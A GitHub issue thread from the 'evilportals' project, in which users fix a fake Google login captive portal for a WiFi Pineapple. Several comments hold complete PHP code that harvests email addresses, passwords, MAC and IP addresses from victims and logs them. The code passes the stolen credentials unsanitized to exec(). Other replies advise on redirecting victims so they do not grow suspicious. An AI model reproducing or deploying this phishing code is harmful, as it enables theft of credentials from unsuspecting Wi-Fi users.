### ISSUE TITLE
You have not been authorized

### ISSUE THREAD

**Issue by weSh** [kbeflo/evilportals#21]
Hi,

I used all the portals, but for all except for Default, the user receives a blank page with the message: You have not been authorized

Is their a specific reason?

Thanks for help

**Comment by KyleDrPizza** [comment]
Same could anybody give me a fix @justahak5user @kbeflo @stiliajohny @

**Comment by H4xl0r** [comment]
You need to call the success fuction in the php after the credentials are written to the file...

**Comment by KyleDrPizza** [comment]
Is it on MyPortal.php

**Comment by KyleDrPizza** [comment]
Could you please give me the code

**Comment by KyleDrPizza** [comment]
could you place the code down below please @H4xl0r

**Comment by KyleDrPizza** [comment]
![image](https://user-images.githubusercontent.com/48371379/54494151-ba152200-48ad-11e9-9975-66e0fefe13d8.png)

**Comment by H4xl0r** [comment]
`if (isset($_POST['email'])) {
            $email = isset($_POST['email']) ? $_POST['email'] : 'email';
            $pwd = isset($_POST['password']) ? $_POST['password'] : 'password';
            $hostname = isset($_POST['hostname']) ? $_POST['hostname'] : 'hostname';
            $mac = isset($_POST['mac']) ? $_POST['mac'] : 'mac';
            $ip = isset($_POST['ip']) ? $_POST['ip'] : 'ip';
            file_put_contents("$dir/evilportal-logs/google-login.txt", "[" . date('Y-m-d H:i:s') . "Z]\n" . "email: {$email}\npassword: {$pwd}\nhostname: {$hostname}\nmac: {$mac}\nip: {$ip}\n\n", FILE_APPEND);
            
            exec("notify $email' - '$pwd");
        }
        **// handle form input or other extra things there**
              showSuccess();


        // Call parent to handle basic authorization first
        parent::handleAuthorization();

    }

    public function showSuccess()
    {
        // Calls default success message
        parent::showSuccess();
    }`

**Comment by H4xl0r** [comment]
I would also add some redirect to the function showScuccess()
```
public function showSuccess()
{
    // Calls default success message
    parent::showSuccess();
    header('Location: '.$newURL);
}


```

**Comment by KyleDrPizza** [comment]
Now it's just showing a blank white screen and i'm testing it on iphone because everyone has an iphone and it won't let me use the wifi after typing in the credentials. @H4xl0r

**Comment by H4xl0r** [comment]
for me it is working ... also with iphone
as i said try to reinstall or try to install from the git source here , update ur pine ? 
dont know why its not working for you

**Comment by KyleDrPizza** [comment]
This is my entire code @H4xl0r 
<?php namespace evilportal;

class MyPortal extends Portal
{

    public function handleAuthorization()
    {
        
        $dirs = array(
            '/root/', 
            '/sd/',
        );

        $dirs = array_filter($dirs, 'file_exists');
        $dirs = array_filter($dirs, 'is_writeable');

        if (empty($dirs)) {
            die("die");
        }

        $dir = array_pop($dirs);
        $want = $dir . DIRECTORY_SEPARATOR . 'evilportal-logs';

        if (file_exists($want)) {
        } 

        else {
            mkdir($want);
        }

        if (!file_exists($want)) {
        }

        if (!is_dir($want)) {
        }

        if (!is_writeable($want)) {
        }

        $want .= DIRECTORY_SEPARATOR;

        if (isset($_POST['email'])) {
            $email = isset($_POST['email']) ? $_POST['email'] : 'email';
            $pwd = isset($_POST['password']) ? $_POST['password'] : 'password';
            $hostname = isset($_POST['hostname']) ? $_POST['hostname'] : 'hostname';
            $mac = isset($_POST['mac']) ? $_POST['mac'] : 'mac';
            $ip = isset($_POST['ip']) ? $_POST['ip'] : 'ip';
            file_put_contents("$dir/evilportal-logs/google-login.txt", "[" . date('Y-m-d H:i:s') . "Z]\n" . "email: {$email}\npassword: {$pwd}\nhostname: {$hostname}\nmac: {$mac}\nip: {$ip}\n\n", FILE_APPEND);
            
            exec("notify $email' - '$pwd");
        }
        // handle form input or other extra things there
        showSuccess();
        
        // Call parent to handle basic authorization first
        parent::handleAuthorization();

    }

    public function showSuccess()
    {
        // Calls default success message
        parent::showSuccess();
        header('Location: https://www.google.com');
    }
}

**Comment by KyleDrPizza** [comment]
<?php namespace evilportal;

class MyPortal extends Portal
{

    public function handleAuthorization()
    {
        
        $dirs = array(
            '/root/', 
            '/sd/',
        );

        $dirs = array_filter($dirs, 'file_exists');
        $dirs = array_filter($dirs, 'is_writeable');

        if (empty($dirs)) {
            die("die");
        }

        $dir = array_pop($dirs);
        $want = $dir . DIRECTORY_SEPARATOR . 'evilportal-logs';

        if (file_exists($want)) {
        } 

        else {
            mkdir($want);
        }

        if (!file_exists($want)) {
        }

        if (!is_dir($want)) {
        }

        if (!is_writeable($want)) {
        }

        $want .= DIRECTORY_SEPARATOR;

        if (isset($_POST['email'])) {
            $email = isset($_POST['email']) ? $_POST['email'] : 'email';
            $pwd = isset($_POST['password']) ? $_POST['password'] : 'password';
            $hostname = isset($_POST['hostname']) ? $_POST['hostname'] : 'hostname';
            $mac = isset($_POST['mac']) ? $_POST['mac'] : 'mac';
            $ip = isset($_POST['ip']) ? $_POST['ip'] : 'ip';
            file_put_contents("$dir/evilportal-logs/google-login.txt", "[" . date('Y-m-d H:i:s') . "Z]\n" . "email: {$email}\npassword: {$pwd}\nhostname: {$hostname}\nmac: {$mac}\nip: {$ip}\n\n", FILE_APPEND);
            
            exec("notify $email' - '$pwd");
        }
        // handle form input or other extra things there
        showSuccess();
        
        // Call parent to handle basic authorization first
        parent::handleAuthorization();

    }

    public function showSuccess()
    {
        // Calls default success message
        parent::showSuccess();
        header('Location: https://www.google.com');
    }
}

**Comment by H4xl0r** [comment]
Need also the version of Evil portal you have installed and from where

**Comment by KyleDrPizza** [comment]
2.4.2

**Comment by H4xl0r** [comment]
you need 3.1

**Comment by KyleDrPizza** [comment]
[myportal.txt](https://github.com/kbeflo/evilportals/files/2975981/myportal.txt)

**Comment by H4xl0r** [comment]
ok looks fine so its the version

**Comment by KyleDrPizza** [comment]
where do i get it

**Comment by H4xl0r** [comment]
by the way the redirect is not needed anymore as i see he will try to redirect you to the requestet url...so you can remove it or leave it.

**Comment by H4xl0r** [comment]
via packages manager ? modules evil portal 3.1 ? 

or manually via the documentation here :+1: 
https://github.com/frozenjava/EvilPortalNano

**Comment by KyleDrPizza** [comment]
how do I put that new update in @H4xl0r

**Comment by KyleDrPizza** [comment]
What do I do

**Comment by KyleDrPizza** [comment]
https://cdn.discordapp.com/attachments/319932050041733125/557312794534346754/image0.png

**Comment by KyleDrPizza** [comment]
Still not working @kbeflo/evilportals
<reply@reply.github.com>

**Comment by kbeflo** [comment]
Authorization is not correctly done. Although it shows "You have not been authorized" clients get listed in Authorized Clients list and gets internet connection anyway.

**Comment by KyleDrPizza** [comment]
They’ll still get suspicious though

**Comment by H4xl0r** [comment]
> THIS IS WHAT I'M GETTING NOW! @H4xl0r https://cdn.discordapp.com/attachments/319932050041733125/557312794534346754/image0.png

Your portal is buggous , go ssh into the pinapple delete everything inside /www/ 
and reinstall Portal

**Comment by H4xl0r** [comment]
I Think it can also be closed here ! 
Everybody facing problems reinstall the evil portal from https://github.com/frozenjava/EvilPortalNano
and then use the google page here as example ..

**Comment by KyleDrPizza** [comment]
What is your email kbeflo

**Comment by KyleDrPizza** [comment]
I tried that and it didn't work can you just send me all your files
please. @kbeflo/evilportals

**Comment by H4xl0r** [comment]
You need portal from https://github.com/frozenjava/EvilPortalNano 

and google-login from my repo , https://github.com/H4xl0r/evilportals/tree/master/portals/google-login

 cause he still not pullled the fix

**Comment by H4xl0r** [comment]
CLOSE !

**Comment by KyleDrPizza** [comment]
thank you it doesn't bring up a white screen anymore it brings up some
other Google page

**Comment by KyleDrPizza** [comment]
what is your email bro in case anything goes wrong with anything else

**Comment by H4xl0r** [comment]
Just contact me via my repo ! 
The fix is still not pulled jet here ! and you can still decide where the user should land 
inside the index of the portal the form is having input like : 
`	<input type="hidden" name="target" value="https://store.google.com/">`

 you can change https://store.google.com to the wished destination !

**Comment by H4xl0r** [comment]
CLOSE!

**Comment by ryanrohypnol** [comment]
I'm having the same issue, I get a successful log and the clients IP is added to "Authorized", but a page saying "You have not been authorized" displays, and when the client attempts to close, iOS asks to "Use Without Internet" Any suggestions? @kbeflo @H4xl0r 

Thank you, my Pineapple has an internet connection and works without the portal turned on.
